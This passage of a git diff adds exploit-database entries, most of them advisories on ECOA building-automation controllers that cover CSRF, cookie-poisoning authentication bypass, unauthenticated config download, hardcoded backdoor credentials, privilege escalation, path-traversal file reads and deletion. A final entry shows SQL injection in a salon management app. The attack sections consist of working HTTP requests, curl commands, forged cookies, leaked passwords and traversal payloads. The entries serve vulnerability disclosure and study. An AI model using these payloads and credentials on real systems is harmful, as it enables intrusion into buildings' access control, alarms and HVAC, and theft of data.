shutdown and account password change with +administrative privileges if a logged-in user visits a malicious web site. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5671 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php + + +25.06.2021 + +-- + + +Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm +---------------------------------------------------------------------- + +- CSRF exist in entire solution for any CRUD operation. + + +PoC: + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50279.txt b/exploits/hardware/webapps/50279.txt new file mode 100644 index 000000000..b9d6fc732 --- /dev/null +++ b/exploits/hardware/webapps/50279.txt @@ -0,0 +1,121 @@ +# Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Cookie Poisoning Authentication Bypass + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker +through cookie poisoning can bypass authentication and disclose sensitive information and circumvent +physical access controls in smart homes and buildings and manipulate HVAC. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5672 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php + + +25.06.2021 + +-- + + +Authentication Bypass +--------------------- + +- Authentication bypass happens by modifying the Cookie values. +- Setting the UCLS Cookie larger or equal to 19 bypasses security controls. + + +Request: + +GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1 +Host: 192.168.1.3:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0 +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache \ No newline at end of file diff --git a/exploits/hardware/webapps/50280.txt b/exploits/hardware/webapps/50280.txt new file mode 100644 index 000000000..f4039ea51 --- /dev/null +++ b/exploits/hardware/webapps/50280.txt @@ -0,0 +1,131 @@ +# Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Configuration Download Information Disclosure + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to configuration disclosure when direct object reference is made +to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to +disclose sensitive information and help her in authentication bypass, privilege escalation and full +system access. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5673 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php + + +25.06.2021 + +-- + + +Configuration / Backup Download / Privilege Escalation / Password Disclosure +---------------------------------------------------------------------------- + +- Unauthenticated config download reveals plain-text passwords + +$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat +$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat +$ strings * +... +... +/opt/webpage/pwsd.bin +/user +user +embed +power +1234 +1234 +/opt/webpage/system.bin +Oboothr=24 +bootmin=00 +OutIDWork=Y +language=big5 +seclanguage=Y +ValSet=Y +allpollTm=500 +httpusr=embed +httppwd=power +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50281.txt b/exploits/hardware/webapps/50281.txt new file mode 100644 index 000000000..d29e73c82 --- /dev/null +++ b/exploits/hardware/webapps/50281.txt @@ -0,0 +1,114 @@ +# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller has hidden backdoors in several binaries that serve the web application. Any +unauthenticated attacker can download all the resources and binaries/services that serve the controller +and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for +backdoor access with full functionality of the Smart Home, Access Control and Building Automation +System solutions. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5674 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php + + +25.06.2021 + +-- + + +Backdoor Accounts / Authentication Bypass +----------------------------------------- + +- Example of backdoors revealed in httpser.elf binary: +... +... + VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor"); + if (VAR2 == (char *)0x0) { + VAR2 = strstr(ARG1,"username=amandoor&password=amandoor"); +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50284.txt b/exploits/hardware/webapps/50284.txt new file mode 100644 index 000000000..63e0244ce --- /dev/null +++ b/exploits/hardware/webapps/50284.txt @@ -0,0 +1,110 @@ +# Exploit Title: ECOA Building Automation System - Remote Privilege Escalation +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Remote Privilege Escalation + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate +privileges by disclosing credentials of administrative accounts in plain-text. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5677 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php + + +25.06.2021 + +-- + + +Privilege Escalation +-------------------- + +- Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text. + + +Request: + +$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed +embedpower19 rootembed19  \ No newline at end of file diff --git a/exploits/hardware/webapps/50285.txt b/exploits/hardware/webapps/50285.txt new file mode 100644 index 000000000..63456514a --- /dev/null +++ b/exploits/hardware/webapps/50285.txt @@ -0,0 +1,133 @@ +# Exploit Title: ECOA Building Automation System - Local File Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Local File Disclosure Vulnerability + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST +parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and +disclose sensitive and system information. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5679 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + + +25.06.2021 + +-- + + +Arbitrary File Disclosure +------------------------- + +- Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information. + + +Request: + +POST /viewlog.jsp HTTP/1.1 +Host: 192.168.1.3:8080 + +yr=2021&mh=6&fname=../../../../../../../../etc/passwd + + +root:x:0:0:root:/root:/bin/sh +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/var/spool/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50286.txt b/exploits/hardware/webapps/50286.txt new file mode 100644 index 000000000..9523d81ac --- /dev/null +++ b/exploits/hardware/webapps/50286.txt @@ -0,0 +1,110 @@ +# Exploit Title: ECOA Building Automation System - Arbitrary File Deletion +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Arbitrary File Deletion + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET +parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause +denial of service scenario. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5680 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php + + +25.06.2021 + +-- + + +Arbitrary File Deletion +----------------------- + +- Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence. + + +Request: + +GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1 \ No newline at end of file diff --git a/exploits/php/webapps/50274.txt b/exploits/php/webapps/50274.txt new file mode 100644 index 000000000..7cb1d5767 --- /dev/null +++ b/exploits/php/webapps/50274.txt @@ -0,0 +1,30 @@ +# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities +# Date: 2021-09-09 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql +# Version: 1.0 +# Tested on: Windows 10 - XAMPP Server + +# Vulnerable page : +http://localhost/msms/admin/edit-customer-detailed.php?editid= + +# Proof Of Concept : +# 1 . Download And install [ Men Salon Management System ] +# 2 . Go to /msms/admin/index.php and Enter Username & Password +# 3 . Navigate to >> Customer List +# 4 . In the action column, click Edit +# 5 . Enter the payload into the Url and Fields + +# [ Sql Injection ] : + +Vulnerable paramater : +The editid paramater is Vulnerable to sqli + +GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+ + +# [ Stored Cross-Site Scripting ] : + +Vulnerable Fields : Name & Email + +Payload Used: "> \ No newline at end of file diff --git a/exploits/php/webapps/50287.py b/exploits/php/webapps/50287.py new file mode 100755 index 000000000..b62111e76 --- /dev/null +++ b/exploits/php/webapps/50287.py @@ -0,0 